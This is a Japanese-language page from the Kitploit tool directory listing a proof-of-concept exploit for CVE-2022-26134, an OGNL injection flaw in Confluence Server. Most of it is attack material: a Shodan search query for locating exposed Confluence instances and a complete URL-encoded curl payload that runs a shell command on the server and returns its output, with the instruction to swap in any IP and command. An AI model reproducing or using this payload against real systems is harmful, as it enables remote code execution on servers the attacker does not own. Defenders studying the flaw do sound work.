Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Confluence-CVE-2022-26134 — Confluence Server における CVE-2022-26134 の概念実証エクスプロイト。OGNLインジェクションを使用し、細工されたHTTPリクエストを介してコマンドを実行します。 | Kitploit
ツール/GitHubGitHub/y000o/confluence-cve-2022-26134
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロール
GitHuby000o/confluence-cve-2022-26134

Confluence-CVE-2022-26134

Confluence Server における CVE-2022-26134 の概念実証エクスプロイト。OGNLインジェクションを使用し、細工されたHTTPリクエストを介してコマンドを実行します。

リポジトリを見る
4224年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Confluence-CVE-2022-26134

Shodan の dork

root@kitploit:~
https://www.shodan.io/search?query=http.favicon.hash%3A-305179312&page=2

Curl poc

root@kitploit:~
curl -v http://10.0.0.247:8090/%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Cmd-Response%22%2CClass.forName%28%22javax.script.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20d%3D%27%27%3Bvar%20i%20%3D%20java.lang.Runtime.getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%3B%20while%28i.available%28%29%29d%2B%3DString.fromCharCode%28i.read%28%29%29%3Bd%22%29%29%7D/

IP とコマンドを変更するだけです。

ツールをダウンロード